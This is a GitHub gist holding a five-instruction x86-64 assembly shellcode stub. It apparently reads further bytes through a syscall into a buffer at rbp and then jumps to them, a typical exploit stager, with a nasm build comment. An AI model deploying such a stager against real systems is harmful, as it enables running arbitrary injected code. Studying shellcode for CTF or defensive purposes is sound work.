Skip to content

Instantly share code, notes, and snippets.

@chrysh
Last active October 11, 2016 20:31
Show Gist options
  • Save chrysh/2202afe7ae23875d3b776d3078bf91e4 to your computer and use it in GitHub Desktop.
Save chrysh/2202afe7ae23875d3b776d3078bf91e4 to your computer and use it in GitHub Desktop.
BITS 64
pop rdx
pop rdi
mov rsi, rbp
syscall
call rbp
; nasm shellcode.s -o shellcode && hd shellcode
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment